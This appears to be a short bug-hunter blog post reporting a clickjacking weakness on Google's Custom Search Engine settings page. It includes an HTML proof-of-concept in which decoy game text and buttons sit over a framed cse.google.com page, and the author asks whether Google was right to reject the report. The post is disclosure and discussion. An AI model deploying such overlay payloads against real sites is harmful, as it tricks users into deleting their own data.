I Found Clickjacking on Google CSE. Is This Important?

Feb 10, 2019 · 2 min read

While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone’s CSE.

Summary: Attacker can delete victim’s CSE.

Steps to reproduce:

  1. Go to https://cse.google.com/
  2. It can be embedded into any webpage.
  3. Attacker may manipulate HTML template so it can delete victim’s CSE.

I wrote an exploit code for clickjacking and here is the exploit code:

<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>

By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.

About how attacker can make someone unconsciously delete their CSE, you can check my video POC here:

Enough about the explanation.

Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone’s data (CSE), isn’t this a bug? But the response I got was very surprising.

The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people’s data.

What do you think? Is this a bug? Or is it just me who overestimates this as a bug?

This article already published in dev.to.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store